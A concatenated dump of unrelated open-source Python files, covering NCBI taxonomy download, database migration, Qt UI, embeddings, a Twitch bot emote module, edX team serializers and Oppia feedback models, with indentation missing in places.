'nucl_wgs.accession2taxid.gz',
'pdb.accession2taxid.gz',
'prot.accession2taxid.gz',
'prot.accession2taxid.FULL.gz'
]
if not os.path.exists(workdir):
os.makedirs(workdir)
for map in map_files:
src = "{}{}".format(url, map)
dest = os.path.join(workdir, map)
print("Downloading taxonomy accession2taxid file from {} to {}".format(src, dest))
        response = None
        try:
            req = Request(src)
            response = urlopen(req)
            with open(dest, 'wb') as dst:
                while True:
                    chunk = response.read(2**10)
                    if chunk:
                        dst.write(chunk)
                    else:
                        break
        finally:
            # Close the HTTP response only if urlopen() succeeded; src still
            # holds the URL string when the request itself fails.
            if response:
                response.close()
def move_files_to_final_dir(workdir, target_directory, copy=False):
for filename in os.listdir(workdir):
if copy:
shutil.copy(os.path.join(workdir, filename), target_directory)
else:
shutil.move(os.path.join(workdir, filename), target_directory)
def main(args):
workdir = os.path.abspath(os.path.join(os.getcwd(), 'taxonomy'))
url_download(args.url, workdir)
data_manager_entry = {}
data_manager_entry['value'] = args.name.lower()
data_manager_entry['name'] = args.name
data_manager_entry['path'] = '.'
data_manager_json = dict(data_tables=dict(ncbi_taxonomy=data_manager_entry))
with open(args.output) as fh:
params = json.load(fh)
if args.name_maps:
workdir_a2t = os.path.join(os.getcwd(), 'accession2taxid')
download_name_maps("ftp://ftp.ncbi.nlm.nih.gov/pub/taxonomy/accession2taxid/", workdir_a2t, args.partial)
target_directory_a2t = os.path.join(params['output_data'][0]['extra_files_path'], "accession2taxid")
os.makedirs(target_directory_a2t)
move_files_to_final_dir(workdir_a2t, target_directory_a2t)
# Also copy taxonomy data to accession2taxid dir
move_files_to_final_dir(workdir, target_directory_a2t, copy=True)
data_manager_json['data_tables']['ncbi_accession2taxid'] = data_manager_entry
target_directory_tax = os.path.join(params['output_data'][0]['extra_files_path'], "taxonomy")
os.makedirs(target_directory_tax)
move_files_to_final_dir(workdir, target_directory_tax)
with open(args.output, 'w') as fh:
json.dump(data_manager_json, fh, sort_keys=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Create data manager json.')
parser.add_argument('--out', dest='output', action='store', help='JSON filename')
parser.add_argument('--name', dest='name', action='store', default=str(datetime.date.today()), help='Data table entry unique ID')
parser.add_argument('--url', dest='url', action='store', default='ftp://ftp.ncbi.nih.gov/pub/taxonomy/taxdump.tar.gz', help='Download URL')
parser.add_argument('--name-maps', dest='name_maps', action='store_true', help='')
parser.add_argument('--partial', dest='partial', action='store_true', help='Only download a small subset of data (for testing)')
args = parser.parse_args()
main(args)
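# Example invocation (illustrative; file names are made up):
#   python data_manager.py --out galaxy_params.json --name taxdump_2021 --name-maps --partial
# Galaxy pre-populates the --out JSON with job parameters (including
# extra_files_path); the script reads it, downloads the data, and then
# overwrites the same file with the resulting data table entries.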
| mit | 5,852,440,613,730,094,000 | 32.298507 | 143 | 0.597042 | false |
django-ch/olympus-project | src/migrations/versions/8d62dbc19154_.py | 1 | 1096 | """empty message
Revision ID: 8d62dbc19154
Revises: 19e3c7b51037
Create Date: 2017-03-04 20:18:51.833788
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '8d62dbc19154'
down_revision = '19e3c7b51037'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('routes', sa.Column('race_id', sa.Integer(), nullable=True))
op.drop_constraint('routes_route_id_fkey', 'routes', type_='foreignkey')
op.create_foreign_key(None, 'routes', 'races', ['race_id'], ['id'])
op.drop_column('routes', 'route_id')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('routes', sa.Column('route_id', sa.INTEGER(), autoincrement=False, nullable=True))
op.drop_constraint(None, 'routes', type_='foreignkey')
op.create_foreign_key('routes_route_id_fkey', 'routes', 'routes', ['route_id'], ['id'])
op.drop_column('routes', 'race_id')
# ### end Alembic commands ###
| gpl-2.0 | 2,678,023,165,994,155,500 | 31.235294 | 100 | 0.666971 | false |
zbarge/zeex | zeex/core/ui/project/main_ui.py | 1 | 6501 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'C:/Users/Zeke/Google Drive/dev/python/zeex/zeex/core/ui/project/main.ui'
#
# Created: Mon Nov 13 22:57:18 2017
# by: pyside-uic 0.2.15 running on PySide 1.2.2
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_ProjectWindow(object):
def setupUi(self, ProjectWindow):
ProjectWindow.setObjectName("ProjectWindow")
ProjectWindow.resize(644, 422)
self.centralwidget = QtGui.QWidget(ProjectWindow)
self.centralwidget.setObjectName("centralwidget")
self.horizontalLayout = QtGui.QHBoxLayout(self.centralwidget)
self.horizontalLayout.setObjectName("horizontalLayout")
self.treeView = FileSystemTreeView(self.centralwidget)
self.treeView.setObjectName("treeView")
self.horizontalLayout.addWidget(self.treeView)
ProjectWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(ProjectWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 644, 21))
self.menubar.setObjectName("menubar")
self.menuFile = QtGui.QMenu(self.menubar)
self.menuFile.setObjectName("menuFile")
self.menuSettings = QtGui.QMenu(self.menubar)
self.menuSettings.setObjectName("menuSettings")
self.menuRecent_Files = QtGui.QMenu(self.menubar)
self.menuRecent_Files.setObjectName("menuRecent_Files")
self.menuActions = QtGui.QMenu(self.menubar)
self.menuActions.setObjectName("menuActions")
ProjectWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(ProjectWindow)
self.statusbar.setObjectName("statusbar")
ProjectWindow.setStatusBar(self.statusbar)
self.toolBar = QtGui.QToolBar(ProjectWindow)
self.toolBar.setObjectName("toolBar")
ProjectWindow.addToolBar(QtCore.Qt.LeftToolBarArea, self.toolBar)
self.actionNew = QtGui.QAction(ProjectWindow)
self.actionNew.setObjectName("actionNew")
self.actionOpen = QtGui.QAction(ProjectWindow)
self.actionOpen.setObjectName("actionOpen")
self.actionSave = QtGui.QAction(ProjectWindow)
self.actionSave.setObjectName("actionSave")
self.actionRemove = QtGui.QAction(ProjectWindow)
self.actionRemove.setObjectName("actionRemove")
self.actionPreferences = QtGui.QAction(ProjectWindow)
self.actionPreferences.setObjectName("actionPreferences")
self.actionMergePurge = QtGui.QAction(ProjectWindow)
self.actionMergePurge.setObjectName("actionMergePurge")
self.actionRename = QtGui.QAction(ProjectWindow)
self.actionRename.setObjectName("actionRename")
self.actionZip = QtGui.QAction(ProjectWindow)
self.actionZip.setObjectName("actionZip")
self.actionViewCloud = QtGui.QAction(ProjectWindow)
self.actionViewCloud.setObjectName("actionViewCloud")
self.actionAddFolder = QtGui.QAction(ProjectWindow)
self.actionAddFolder.setObjectName("actionAddFolder")
self.actionUnzip = QtGui.QAction(ProjectWindow)
self.actionUnzip.setObjectName("actionUnzip")
self.menuFile.addAction(self.actionNew)
self.menuFile.addAction(self.actionOpen)
self.menuFile.addAction(self.actionSave)
self.menuFile.addAction(self.actionRemove)
self.menuSettings.addAction(self.actionPreferences)
self.menuActions.addAction(self.actionMergePurge)
self.menuActions.addAction(self.actionAddFolder)
self.menuActions.addAction(self.actionRename)
self.menuActions.addAction(self.actionViewCloud)
self.menuActions.addAction(self.actionUnzip)
self.menuActions.addAction(self.actionZip)
self.menubar.addAction(self.menuFile.menuAction())
self.menubar.addAction(self.menuRecent_Files.menuAction())
self.menubar.addAction(self.menuActions.menuAction())
self.menubar.addAction(self.menuSettings.menuAction())
self.toolBar.addSeparator()
self.retranslateUi(ProjectWindow)
QtCore.QMetaObject.connectSlotsByName(ProjectWindow)
def retranslateUi(self, ProjectWindow):
ProjectWindow.setWindowTitle(QtGui.QApplication.translate("ProjectWindow", "MyProject", None, QtGui.QApplication.UnicodeUTF8))
self.menuFile.setTitle(QtGui.QApplication.translate("ProjectWindow", "File", None, QtGui.QApplication.UnicodeUTF8))
self.menuSettings.setTitle(QtGui.QApplication.translate("ProjectWindow", "Settings", None, QtGui.QApplication.UnicodeUTF8))
self.menuRecent_Files.setTitle(QtGui.QApplication.translate("ProjectWindow", "Recent", None, QtGui.QApplication.UnicodeUTF8))
self.menuActions.setTitle(QtGui.QApplication.translate("ProjectWindow", "Actions", None, QtGui.QApplication.UnicodeUTF8))
self.toolBar.setWindowTitle(QtGui.QApplication.translate("ProjectWindow", "toolBar", None, QtGui.QApplication.UnicodeUTF8))
self.actionNew.setText(QtGui.QApplication.translate("ProjectWindow", "New", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpen.setText(QtGui.QApplication.translate("ProjectWindow", "Open", None, QtGui.QApplication.UnicodeUTF8))
self.actionSave.setText(QtGui.QApplication.translate("ProjectWindow", "Save", None, QtGui.QApplication.UnicodeUTF8))
self.actionRemove.setText(QtGui.QApplication.translate("ProjectWindow", "Remove", None, QtGui.QApplication.UnicodeUTF8))
self.actionPreferences.setText(QtGui.QApplication.translate("ProjectWindow", "Preferences", None, QtGui.QApplication.UnicodeUTF8))
self.actionMergePurge.setText(QtGui.QApplication.translate("ProjectWindow", "Merge/Purge", None, QtGui.QApplication.UnicodeUTF8))
self.actionRename.setText(QtGui.QApplication.translate("ProjectWindow", "Rename", None, QtGui.QApplication.UnicodeUTF8))
self.actionZip.setText(QtGui.QApplication.translate("ProjectWindow", "Zip", None, QtGui.QApplication.UnicodeUTF8))
self.actionViewCloud.setText(QtGui.QApplication.translate("ProjectWindow", "View Cloud", None, QtGui.QApplication.UnicodeUTF8))
self.actionAddFolder.setText(QtGui.QApplication.translate("ProjectWindow", "Add Folder", None, QtGui.QApplication.UnicodeUTF8))
self.actionUnzip.setText(QtGui.QApplication.translate("ProjectWindow", "Unzip", None, QtGui.QApplication.UnicodeUTF8))
from core.views.basic.treeview import FileSystemTreeView
| mit | -8,549,020,228,185,598,000 | 62.116505 | 138 | 0.742809 | false |
MicrosoftGenomics/WarpedLMM | warpedlmm/util/transformations.py | 2 | 1592 | import numpy as np
_exp_lim_val = np.finfo(np.float64).max
_lim_val = 36.0
epsilon = np.finfo(np.float64).resolution
class Exponent(object):
def f(self, x):
return np.where(x<_lim_val, np.where(x>-_lim_val, np.exp(x), np.exp(-_lim_val)), np.exp(_lim_val))
def finv(self, x):
return np.log(x)
def gradfactor(self, f):
return f
def initialize(self, f):
return np.abs(f)
def __str__(self):
return '+ve'
class Linear(object):
def f(self, x):
return x
def finv(self, x):
return x
def gradfactor(self, f):
return 1.0
def initialize(self, f):
return f
def __str__(self):
return ''
class Logexp(object):
def f(self, x):
return np.where(x>_lim_val, x, np.log(1. + np.exp(np.clip(x, -_lim_val, _lim_val)))) + epsilon
#raises overflow warning: return np.where(x>_lim_val, x, np.log(1. + np.exp(x)))
def finv(self, f):
return np.where(f>_lim_val, f, np.log(np.exp(f+1e-20) - 1.))
def gradfactor(self, f):
return np.where(f>_lim_val, 1., 1. - np.exp(-f))
def initialize(self, f):
return np.abs(f)
def __str__(self):
return '+ve'
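# Minimal usage sketch (added for illustration): each transformation maps an
# unconstrained optimiser value x into the model domain via f(), finv()
# inverts it, and gradfactor() gives the chain-rule factor df/dx expressed in
# terms of the transformed value.
#
#   t = Logexp()
#   theta = t.f(-3.0)            # log(1 + exp(-3)) + epsilon, always positive
#   x = t.finv(theta)            # approximately -3.0 again
#   scale = t.gradfactor(theta)  # 1 - exp(-theta)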
# class logexp(transformation):
# domain = POSITIVE
# def f(self, x):
# return np.log(1. + np.exp(x))
# def finv(self, f):
# return np.log(np.exp(f) - 1.)
# def gradfactor(self, f):
# ef = np.exp(f)
# return (ef - 1.) / ef
# def initialize(self, f):
# return np.abs(f)
# def __str__(self):
# return '(+ve)'
| apache-2.0 | -3,212,006,392,889,784,300 | 27.428571 | 106 | 0.535804 | false |
timrae/anki | oldanki/errors.py | 20 | 1139 | # -*- coding: utf-8 -*-
# Copyright: Damien Elmes <[email protected]>
# License: GNU GPL, version 3 or later; http://www.gnu.org/copyleft/gpl.html
"""\
Errors
==============================
"""
__docformat__ = 'restructuredtext'
class Error(Exception):
def __init__(self, message="", **data):
self.data = data
self._message = message
def __str__(self):
m = self._message
if self.data:
m += ": %s" % repr(self.data)
return m
class DeckAccessError(Error):
pass
class ImportFileError(Error):
"Unable to load file to import from."
pass
class ImportFormatError(Error):
"Unable to determine pattern in text file."
pass
class ImportEncodingError(Error):
"The file was not in utf-8."
pass
class ExportFileError(Error):
"Unable to save file."
pass
class SyncError(Error):
"A problem occurred during syncing."
pass
# facts, models
class FactInvalidError(Error):
"""A fact was invalid/not unique according to the model.
'field' defines the problem field.
'type' defines the type of error ('fieldEmpty', 'fieldNotUnique')"""
pass
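# Illustrative sketch (added; not part of the original module): errors carry an
# optional message plus arbitrary keyword data, and __str__ appends the data.
#
#   try:
#       raise DeckAccessError("couldn't open deck", path="/tmp/a.anki")
#   except Error, e:
#       print e    # couldn't open deck: {'path': '/tmp/a.anki'}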
| agpl-3.0 | 5,725,692,757,608,717,000 | 22.244898 | 76 | 0.628622 | false |
jankim/deepnl | deepnl/embeddings.py | 1 | 4634 | # -*- coding: utf-8 -*-
"""
Load word embeddings from different representations.
"""
import os
import numpy as np
import logging
from itertools import izip
# local
from word_dictionary import WordDictionary
# ----------------------------------------------------------------------
class Plain(object):
@classmethod
def read_vectors(cls, filename):
"""
Read an embedding from a plain text file with one vector per
line, values separated by whitespace.
"""
with open(filename, 'rb') as file:
matrix = np.array([[float(value) for value in line.split()]
for line in file])
return matrix
@classmethod
def read_vocabulary(cls, filename):
"""
Read a vocabulary file containing one word per line.
Return a list of words.
"""
words = []
with open(filename, 'rb') as f:
for line in f:
word = unicode(line.strip(), 'utf-8')
if word:
words.append(word)
return words
@classmethod
def write_vocabulary(cls, vocab, filename):
"""
Write a vocabulary to a file containing one word per line.
"""
with open(filename, 'wb') as f:
for word in vocab:
print >> f, word.encode('utf-8')
@classmethod
def write_vectors(cls, filename, matrix):
"""
Write embedding vectors to a plain text file with one vector per
line, values separated by whitespace.
"""
with open(filename, 'wb') as file:
for row in matrix:
print >> file, ' '.join(["%f" % x for x in row])
# ----------------------------------------------------------------------
class Senna(object):
@classmethod
def read_vocabulary(cls, filename):
"""
Read the vocabulary file used by SENNA.
It has one word per line, all lower case except for the special words
PADDING and UNKNOWN.
"""
        return Plain.read_vocabulary(filename)
# ----------------------------------------------------------------------
class Word2Embeddings(object):
@classmethod
def read_vocabulary(cls, filename):
"""
Read the vocabulary used with word2embeddings.
It is the same as a plain text vocabulary, except the embeddings for
the rare/unknown word are the first two items (before any word in the file).
"""
        return Plain.read_vocabulary(filename)
@classmethod
def read_vectors(cls, filename):
"""
Load the feature matrix used by word2embeddings.
"""
import cPickle as pickle
with open(filename, 'rb') as f:
model = pickle.load(f)
return model.get_word_embeddings()
# ----------------------------------------------------------------------
class Word2Vec(object):
@classmethod
def load(cls, filename):
"""
Load words and vectors from a file in word2vec format.
"""
words = []
vectors = []
with open(filename, 'rb') as f:
len, size = f.readline().split()
for line in f:
items = line.split()
word = unicode(items[0], 'utf-8')
words.append(word)
vectors.append([float(x) for x in items[1:]])
# vectors for the special symbols, not present in words, will be
# created later
return np.array(vectors), words
@classmethod
def save(cls, filename, words, vectors):
"""
Save words and vectors to a file in word2vec format.
:param vectors: is a Numpy array
"""
with open(filename, 'wb') as f:
print >> f, len(words), vectors.shape[1]
for word, vector in izip(words, vectors):
print >> f, word.encode('UTF-8'), ' '.join('%f' % w for w in vector)
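# Round-trip sketch (added for illustration): Word2Vec and Plain share the
# same (matrix, word list) convention, so a word2vec text file can be split
# into the separate vector/vocabulary files used elsewhere in this module.
#
#   vectors, words = Word2Vec.load('embeddings.txt')
#   Plain.write_vocabulary(words, 'vocab.txt')
#   Plain.write_vectors('vectors.txt', vectors)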
# ----------------------------------------------------------------------
def generate_vectors(num_vectors, num_features, min_value=-0.1, max_value=0.1):
"""
Generates vectors of real numbers, to be used as word features.
Vectors are initialized randomly with values in the interval [min_value, max_value]
:return: a 2-dim numpy array.
"""
# set the seed for replicability
#np.random.seed(42) # DEBUG
table = np.random.uniform(min_value, max_value, (num_vectors, num_features))
logging.debug("Generated %d feature vectors with %d features each." %
(num_vectors, num_features))
return table
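# Example (added): random embeddings for a 3-word vocabulary plus two special
# symbols, 50 features each; values are drawn uniformly from [-0.1, 0.1].
#   table = generate_vectors(5, 50)   # numpy array of shape (5, 50)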
| gpl-3.0 | 7,357,621,401,348,060,000 | 30.100671 | 87 | 0.528917 | false |
pajlada/pajbot | pajbot/modules/basic/emotes.py | 2 | 10421 | import logging
from pajbot.managers.emote import BTTVEmoteManager, FFZEmoteManager, TwitchEmoteManager
from pajbot.models.command import Command
from pajbot.models.command import CommandExample
from pajbot.modules import BaseModule
from pajbot.modules import ModuleSetting
from pajbot.modules.basic import BasicCommandsModule
from pajbot.streamhelper import StreamHelper
from pajbot.utils import split_into_chunks_with_prefix
log = logging.getLogger(__name__)
class EmotesModule(BaseModule):
ID = __name__.split(".")[-1]
NAME = "Emotes"
ENABLED_DEFAULT = True
DESCRIPTION = "Refresh and list FFZ, BTTV and Sub emotes"
CATEGORY = "Feature"
PARENT_MODULE = BasicCommandsModule
SETTINGS = [
ModuleSetting(
key="global_cd",
label="Global cooldown of all emote-commands (seconds)",
type="number",
required=True,
placeholder="",
default=5,
constraints={"min_value": 0, "max_value": 120},
),
ModuleSetting(
key="user_cd",
label="Per-user cooldown of all emote-commands (seconds)",
type="number",
required=True,
placeholder="",
default=15,
constraints={"min_value": 0, "max_value": 240},
),
ModuleSetting(
key="level",
label="Level required to use the commands",
type="number",
required=True,
placeholder="",
default=100,
constraints={"min_value": 100, "max_value": 2000},
),
ModuleSetting(
key="enable_subemotes", label="Enable !subemotes command", type="boolean", required=True, default=True
),
ModuleSetting(
key="custom_sub_response",
label="A custom message to override the default !subemotes output format. Leave empty to use default format (1 or multiple messages showing all emotes). | Available arguments: {source}, {streamer}",
type="text",
required=False,
placeholder="@{source}, Channel sub emotes can be found here: https://twitchemotes.com/channels/11148817",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="enable_ffzemotes", label="Enable !ffzemotes command", type="boolean", required=True, default=True
),
ModuleSetting(
key="custom_ffz_response",
label="A custom message to override the default !ffzemotes output format. Leave empty to use default format (1 or multiple messages showing all emotes). | Available arguments: {source}, {streamer}",
type="text",
required=False,
placeholder="@{source}, Channel FFZ emotes can be found here: https://www.frankerfacez.com/channel/pajlada",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="enable_bttvemotes", label="Enable !bttvemotes command", type="boolean", required=True, default=True
),
ModuleSetting(
key="custom_bttv_response",
label="A custom message to override the default !bttvemotes output format. Leave empty to use default format (1 or multiple messages showing all emotes). | Available arguments: {source}, {streamer}",
type="text",
required=False,
placeholder="@{source}, Channel BTTV emotes can be found here: https://betterttv.com/users/550daf6562e6bd0027aedb5e",
default="",
constraints={"max_str_len": 400},
),
]
def print_emotes(self, source, manager):
if self.settings[f"custom_{manager.friendly_name.lower()}_response"] != "":
custom_message = self.settings[f"custom_{manager.friendly_name.lower()}_response"]
self.bot.say(custom_message.format(streamer=StreamHelper.get_streamer_display(), source=source))
else:
emotes = manager.channel_emotes
messages = split_into_chunks_with_prefix(
[{"prefix": f"{manager.friendly_name} emotes:", "parts": [e.code for e in emotes]}],
default=f"No {manager.friendly_name} Emotes active in this chat :(",
)
for message in messages:
self.bot.say(message)
def print_twitch_emotes(self, source, **rest):
if self.settings["custom_sub_response"] != "":
custom_message = self.settings["custom_sub_response"]
self.bot.say(custom_message.format(streamer=StreamHelper.get_streamer_display(), source=source))
else:
manager = self.bot.emote_manager.twitch_emote_manager
messages = split_into_chunks_with_prefix(
[
{"prefix": "Subscriber emotes:", "parts": [e.code for e in manager.tier_one_emotes]},
{"prefix": "T2:", "parts": [e.code for e in manager.tier_two_emotes]},
{"prefix": "T3:", "parts": [e.code for e in manager.tier_three_emotes]},
],
default=f"Looks like {StreamHelper.get_streamer_display()} has no subscriber emotes! :(",
)
for message in messages:
self.bot.say(message)
def reload_cmd(self, manager):
# manager is an instance of the manager in the bot and the class of the manager on the web interface
reload_msg = f"Reloading {manager.friendly_name} emotes..."
def do_reload(bot, source, **rest):
bot.whisper(source, reload_msg)
self.bot.action_queue.submit(manager.update_all)
return Command.raw_command(
do_reload,
level=500,
delay_all=10,
delay_user=20,
examples=[
CommandExample(
None,
f"Reload all active {manager.friendly_name} emotes for this channel.",
chat=f"user: !{manager.friendly_name.lower()}emotes reload\n" + f"bot>user: {reload_msg}",
).parse()
],
)
def print_cmd(self, manager, examples):
def do_print(source, **rest):
self.print_emotes(source, manager)
if self.settings[f"custom_{manager.friendly_name.lower()}_response"] != "":
bot_response = "bot: " + self.settings[f"custom_{manager.friendly_name.lower()}_response"].format(
source="pajlada", streamer=StreamHelper.get_streamer_display()
)
else:
bot_response = f"bot: {manager.friendly_name} emotes: {examples}"
return Command.raw_command(
do_print,
level=self.settings["level"],
delay_all=self.settings["global_cd"],
delay_user=self.settings["user_cd"],
examples=[
CommandExample(
None,
f"Show all active {manager.friendly_name} emotes for this channel.",
chat=f"user: !{manager.friendly_name.lower()}emotes\n" + bot_response,
).parse()
],
)
def print_twitch_cmd(self):
if self.settings["custom_sub_response"] != "":
bot_response = "bot: " + self.settings["custom_sub_response"].format(
source="pajlada", streamer=StreamHelper.get_streamer_display()
)
else:
bot_response = (
"bot: Subscriber emotes: forsenE forsenC forsenK forsenW Tier 2: forsenSnus Tier 3: forsen2499"
)
return Command.raw_command(
self.print_twitch_emotes,
level=self.settings["level"],
delay_all=self.settings["global_cd"],
delay_user=self.settings["user_cd"],
examples=[
CommandExample(
None,
f"Show all active sub emotes for {StreamHelper.get_streamer_display()}.",
chat="user: !subemotes\n" + bot_response,
).parse()
],
)
def load_commands(self, **options):
cmd_reload_bttv_emotes = self.reload_cmd(
self.bot.emote_manager.bttv_emote_manager if self.bot else BTTVEmoteManager
)
cmd_reload_ffz_emotes = self.reload_cmd(
self.bot.emote_manager.ffz_emote_manager if self.bot else FFZEmoteManager
)
cmd_reload_twitch_emotes = self.reload_cmd(
self.bot.emote_manager.twitch_emote_manager if self.bot else TwitchEmoteManager
)
cmd_print_bttv_emotes = self.print_cmd(
self.bot.emote_manager.bttv_emote_manager if self.bot else BTTVEmoteManager, "forsenPls gachiGASM"
)
cmd_print_ffz_emotes = self.print_cmd(
self.bot.emote_manager.ffz_emote_manager if self.bot else FFZEmoteManager, "FeelsOkayMan Kapp LULW"
)
# The ' ' is there to make things look good in the
# web interface.
if self.settings["enable_bttvemotes"]:
self.commands["bttvemotes"] = Command.multiaction_command(
delay_all=self.settings["global_cd"],
delay_user=self.settings["user_cd"],
level=self.settings["level"],
default=" ",
fallback=" ",
command="bttvemotes",
commands={"reload": cmd_reload_bttv_emotes, " ": cmd_print_bttv_emotes},
)
if self.settings["enable_ffzemotes"]:
self.commands["ffzemotes"] = Command.multiaction_command(
delay_all=self.settings["global_cd"],
delay_user=self.settings["user_cd"],
level=self.settings["level"],
default=" ",
fallback=" ",
command="ffzemotes",
commands={"reload": cmd_reload_ffz_emotes, " ": cmd_print_ffz_emotes},
)
if self.settings["enable_subemotes"]:
self.commands["subemotes"] = Command.multiaction_command(
delay_all=self.settings["global_cd"],
delay_user=self.settings["user_cd"],
level=self.settings["level"],
default=" ",
fallback=" ",
command="subemotes",
commands={"reload": cmd_reload_twitch_emotes, " ": self.print_twitch_cmd()},
)
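        # Note (added comment): each of the commands registered above is a
        # multiaction command, so e.g. "!bttvemotes" with no argument runs the
        # " " sub-command that prints the emote list, while "!bttvemotes
        # reload" runs the level-500 reload sub-command through the emote
        # manager.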
| mit | -703,860,394,121,829,100 | 42.60251 | 211 | 0.570579 | false |
edcast-inc/edx-platform-edcast | lms/djangoapps/teams/serializers.py | 23 | 3821 | """Defines serializers used by the Team API."""
from django.contrib.auth.models import User
from rest_framework import serializers
from openedx.core.lib.api.serializers import CollapsedReferenceSerializer
from openedx.core.lib.api.fields import ExpandableField
from .models import CourseTeam, CourseTeamMembership
from openedx.core.djangoapps.user_api.serializers import UserSerializer
class UserMembershipSerializer(serializers.ModelSerializer):
"""Serializes CourseTeamMemberships with only user and date_joined
Used for listing team members.
"""
user = ExpandableField(
collapsed_serializer=CollapsedReferenceSerializer(
model_class=User,
id_source='username',
view_name='accounts_api',
read_only=True,
),
expanded_serializer=UserSerializer(),
)
class Meta(object):
"""Defines meta information for the ModelSerializer."""
model = CourseTeamMembership
fields = ("user", "date_joined")
read_only_fields = ("date_joined",)
class CourseTeamSerializer(serializers.ModelSerializer):
"""Serializes a CourseTeam with membership information."""
id = serializers.CharField(source='team_id', read_only=True) # pylint: disable=invalid-name
membership = UserMembershipSerializer(many=True, read_only=True)
class Meta(object):
"""Defines meta information for the ModelSerializer."""
model = CourseTeam
fields = (
"id",
"name",
"is_active",
"course_id",
"topic_id",
"date_created",
"description",
"country",
"language",
"membership",
)
read_only_fields = ("course_id", "date_created")
class CourseTeamCreationSerializer(serializers.ModelSerializer):
"""Deserializes a CourseTeam for creation."""
class Meta(object):
"""Defines meta information for the ModelSerializer."""
model = CourseTeam
fields = (
"name",
"course_id",
"description",
"topic_id",
"country",
"language",
)
def restore_object(self, attrs, instance=None):
"""Restores a CourseTeam instance from the given attrs."""
return CourseTeam.create(
name=attrs.get("name", ''),
course_id=attrs.get("course_id"),
description=attrs.get("description", ''),
topic_id=attrs.get("topic_id", ''),
country=attrs.get("country", ''),
language=attrs.get("language", ''),
)
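    # Illustrative sketch (added; field values are invented): deserializing a
    # team-creation request with this serializer.
    #
    #   serializer = CourseTeamCreationSerializer(data={
    #       'name': 'Team Awesome',
    #       'course_id': 'org/course/run',
    #       'description': 'A team for the API docs',
    #   })
    #   if serializer.is_valid():
    #       team = serializer.save()   # builds the CourseTeam via restore_object()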
class MembershipSerializer(serializers.ModelSerializer):
"""Serializes CourseTeamMemberships with information about both teams and users."""
user = ExpandableField(
collapsed_serializer=CollapsedReferenceSerializer(
model_class=User,
id_source='username',
view_name='accounts_api',
read_only=True,
),
expanded_serializer=UserSerializer(read_only=True)
)
team = ExpandableField(
collapsed_serializer=CollapsedReferenceSerializer(
model_class=CourseTeam,
id_source='team_id',
view_name='teams_detail',
read_only=True,
),
expanded_serializer=CourseTeamSerializer(read_only=True)
)
class Meta(object):
"""Defines meta information for the ModelSerializer."""
model = CourseTeamMembership
fields = ("user", "team", "date_joined")
read_only_fields = ("date_joined",)
class TopicSerializer(serializers.Serializer):
"""Serializes a topic."""
description = serializers.CharField()
name = serializers.CharField()
id = serializers.CharField() # pylint: disable=invalid-name
| agpl-3.0 | 8,853,858,381,622,441,000 | 32.226087 | 96 | 0.622088 | false |
prasanna08/oppia | core/storage/feedback/gae_models.py | 1 | 28683 | # coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Models for Oppia feedback threads and messages."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
from core.platform import models
import feconf
import python_utils
import utils
from google.appengine.ext import ndb
(base_models, user_models) = models.Registry.import_models([
models.NAMES.base_model, models.NAMES.user])
# Allowed feedback thread statuses.
STATUS_CHOICES_OPEN = 'open'
STATUS_CHOICES_FIXED = 'fixed'
STATUS_CHOICES_IGNORED = 'ignored'
STATUS_CHOICES_COMPLIMENT = 'compliment'
STATUS_CHOICES_NOT_ACTIONABLE = 'not_actionable'
STATUS_CHOICES = [
STATUS_CHOICES_OPEN,
STATUS_CHOICES_FIXED,
STATUS_CHOICES_IGNORED,
STATUS_CHOICES_COMPLIMENT,
STATUS_CHOICES_NOT_ACTIONABLE,
]
# Constants used for generating new ids.
_MAX_RETRIES = 10
_RAND_RANGE = 127 * 127
class GeneralFeedbackThreadModel(base_models.BaseModel):
"""Threads for each entity.
The id of instances of this class has the form
[entity_type].[entity_id].[generated_string]
"""
# The type of entity the thread is linked to.
entity_type = ndb.StringProperty(required=True, indexed=True)
# The ID of the entity the thread is linked to.
entity_id = ndb.StringProperty(required=True, indexed=True)
# ID of the user who started the thread. This may be None if the feedback
# was given anonymously by a learner.
original_author_id = ndb.StringProperty(indexed=True)
# Latest status of the thread.
status = ndb.StringProperty(
default=STATUS_CHOICES_OPEN,
choices=STATUS_CHOICES,
required=True,
indexed=True,
)
# Latest subject of the thread.
subject = ndb.StringProperty(indexed=True, required=True)
# Summary text of the thread.
summary = ndb.TextProperty(indexed=False)
# Specifies whether this thread has a related suggestion.
has_suggestion = (
ndb.BooleanProperty(indexed=True, default=False, required=True))
# Cached value of the number of messages in the thread.
message_count = ndb.IntegerProperty(indexed=True, default=0)
# Cached text of the last message in the thread with non-empty content, or
# None if there is no such message.
last_nonempty_message_text = ndb.TextProperty(indexed=False)
# Cached ID for the user of the last message in the thread with non-empty
# content, or None if the message was made anonymously or if there is no
# such message.
last_nonempty_message_author_id = ndb.StringProperty(indexed=True)
@staticmethod
def get_deletion_policy():
"""General feedback thread needs to be pseudonymized for the user."""
return base_models.DELETION_POLICY.LOCALLY_PSEUDONYMIZE
@classmethod
def get_export_policy(cls):
"""Model contains user data."""
return dict(super(cls, cls).get_export_policy(), **{
'entity_type': base_models.EXPORT_POLICY.EXPORTED,
'entity_id': base_models.EXPORT_POLICY.EXPORTED,
'original_author_id': base_models.EXPORT_POLICY.EXPORTED,
'status': base_models.EXPORT_POLICY.EXPORTED,
